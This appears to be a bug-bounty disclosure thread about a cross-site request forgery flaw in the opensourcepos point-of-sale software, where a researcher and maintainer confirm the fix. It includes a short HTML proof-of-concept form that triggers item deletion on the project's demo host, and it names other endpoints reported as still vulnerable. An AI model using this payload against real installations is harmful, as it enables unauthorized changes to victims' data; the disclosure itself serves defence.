Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on

Oct 4th 2021


Description

You have not set any CSRF protection for receivings/delete_item/{item_id} endpoint.

Proof of Concept

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://dev.opensourcepos.org/receivings/delete_item/1">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
We have contacted a member of the opensourcepos team and are waiting to hear back a year ago
jekkos
a year ago

Maintainer


The fix should include this protection. The method is POST only now.

jekkos
a year ago

Maintainer


https://github.com/opensourcepos/opensourcepos/blob/e8f27f547b061b88ed78232e75e859bdf7ebcd6b/application/hooks/method_hook.php#L8

amammad
a year ago

Researcher


I tested this dev.opensourcepos.org

Is this instance still vulnerable ?

amammad
a year ago

Researcher


I test this endpoint and it is still in get :

/sales/complete

and vulnerable to CSRF

jekkos
a year ago

Maintainer


It might have another build deployed now

jekkos
a year ago

Maintainer


I'm redeploying.. you can retry in 10mins

amammad
a year ago

Researcher


as I said, I test again after at now and still this endpoint vulnerable to CSRF

/receivings/complete

because accept GET method besides POST

amammad
a year ago

Researcher


I test receivings/delete_item/{id} and it is OK, jekkos.

a year ago

Maintainer


OK great thanks!

opensourcepos/opensourcepos maintainer validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit e8f27f a year ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation